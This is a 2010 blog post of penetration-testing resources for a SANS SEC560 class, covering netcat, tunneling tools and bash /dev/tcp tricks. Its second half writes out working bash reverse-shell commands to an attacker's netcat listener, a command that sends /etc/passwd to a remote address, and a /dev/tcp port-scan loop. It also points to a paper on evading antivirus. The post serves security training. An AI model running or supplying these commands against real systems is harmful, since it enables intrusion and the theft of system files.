Friday, August 13, 2010

Resources on netcat, /dev/tcp, tunneling, etc.

Here's a few more resources I provided to my SANS SEC560 mentor class. The main topic of this week's session was netcat (with a bit of /dev/tcp thrown in for good measure) & as usual the conversation strayed into other ways to redirect & tunnel traffic so you'll find some resources in that regard below.

I was also asked what were some good webcasts that covered netcat & other pentesting tools & techniques, so there are links to a few of those below as well.


Ed Skoudis- Crazy Ass Necat Relays for Fun & Profit:

Ed Skoudis -Penetration Testing Ninjitsu -

Ed Skoudis /Josh Wright/ Kevin Johnson - Penetration Testing Perfect Storm parts 1-3

Ed Skoudis /Josh Wright/ Kevin Johnson - Penetration Testing Perfect Storm part 4 -

Ed Skoudis & Kevin Johnson - Invasion of the Browser Snatchers, parts 1-3 -

The 'Taking back Netcat' paper (dodging AV detection) -

HowTo on tunneling over SSH -

Netcat variants:





Also, here are some awesome tunneling & proxying tools

PTunnel -

Ptunnel is an application that allows you to reliably tunnel TCP connections to a remote host using ICMP echo request and reply packets, commonly known as ping requests and replies

Stunnel - -

Stunnel is a program that allows you to encrypt arbitrary TCP connections inside SSL

Proxytunnel -

Create tunnels using HTTP and HTTPS proxies (That understand the HTTP CONNECT command). Work as a back-end driver for an OpenSSH client, and create SSH connections through HTTP(S) proxies.

The included paper is a REALLY good read as well -

ProxyChains -

This program allows you to use SSH, TELNET, VNC, FTP and any other Internet application from behind HTTP(HTTPS) and SOCKS(4/5) proxy servers.

BASH connect back shell using /dev/tcp from

GnuCitizen User Link

Atttack Box: nc -l -p Port -vvv

Victim: $ exec 5<>/dev/tcp/IP_Address/Port

Victim: $ cat <&5 | while read line; do $line 2>&5 >&5; done

Neohapsis User Link

Atttack Box: nc -l -p Port -vvv

Victim: $ exec 0 # First we copy our connection over stdin

Victim: $ exec 1>&0 # Next we copy stdin to stdout

Victim: $ exec 2>&0 # And finally stdin to stderr

Victim: $ exec /bin/sh 0&0 2>&0

Everything below is some more /dev/tcp "fu" from "Windows Command Line Ninjitsu" Episode 2 by Ed Skoudis:


• /dev/tcp rocks! • On most Linux variants (except Debian-derived systems like Ubuntu), the default built-in bash can redirect to and from /dev/tcp/[IPaddr]/[port] which a connection with the target IPaddr on that port

• With a little command-line magic, we can use this for Netcat-like behavior

Linux Command-Line File Transfer

• To send a file, we can just redirect its contents into /dev/tcp/[IPaddr]/[port], as in: • $ cat /etc/passwd > /dev/tcp/[IPaddr]/[port]
• Catch it on the other side with a Netcat listener

Linux Command-Line Backdoor via /dev/tcp

• We can connect Standard In, Standard Out, and Standard Error of a bash shell to /dev/tcp to implement a reverse shell backdoor

/bin/bash –i > /dev/tcp/[Attacker_IPaddr]/[port] 0<&1 2>&1

• Shovels a shell from the victim Linux machine to attacker’s waiting Netcat listener, where commands can be entered

Linux Command-Line Port Scanner

• To see if a single port is open, we could run: $ echo > /dev/tcp/[IPaddr]/[port]

Storing Results and Iterating

• But, it does set the error condition variable “$?” to 0 if the port is open, 1 if it is closed • For a port scanner, we could use a while loop that increments through port numbers

$ port=1; while [ $port –lt 1024 ]; do echo > /dev/tcp/[IPaddr]/$port; [ $? == 0 ] && echo $port "is open" >> /tmp/ports.txt; port=`expr $port + 1`; done

• We append results in the loop (>> /tmp/ports.txt) so that they can be tailed while the scan is running

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